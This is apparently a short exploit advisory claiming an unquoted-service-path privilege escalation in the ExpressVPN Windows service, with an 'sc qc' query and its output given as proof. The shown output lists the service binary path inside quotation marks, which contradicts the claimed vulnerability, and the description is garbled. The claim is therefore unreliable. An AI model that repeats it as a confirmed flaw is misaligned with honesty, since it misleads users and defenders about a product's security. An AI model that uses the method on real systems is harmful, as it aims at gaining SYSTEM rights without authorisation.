********************************************************
 # Exploit Title : ExpressVPN - Unquoted Service Path Privilege Escalation
 # Vendor Homepage : www.expressvpn.com 
 # Exploit Author: Iran Cyber Security Group 
 # Date : 2019-07-14 
 # Tested on : Win10  
 # Discovered By : Und3rgr0und 
 # Our Team : www.iran-cyber.net 
 ******************************************************* 
 
 # Description :
 
An older access system gives users access to up levels access. ExpressVPN 
installs a service ("ExpressVPNService") with an unquoted service path running with SYSTEM privileges.
This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.
 
 # POC :
 
 C:\xpl\Und3rgr0und>sc qc ExpressVPNService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExpressVPNService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ExpressVPN Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

 *******************************************************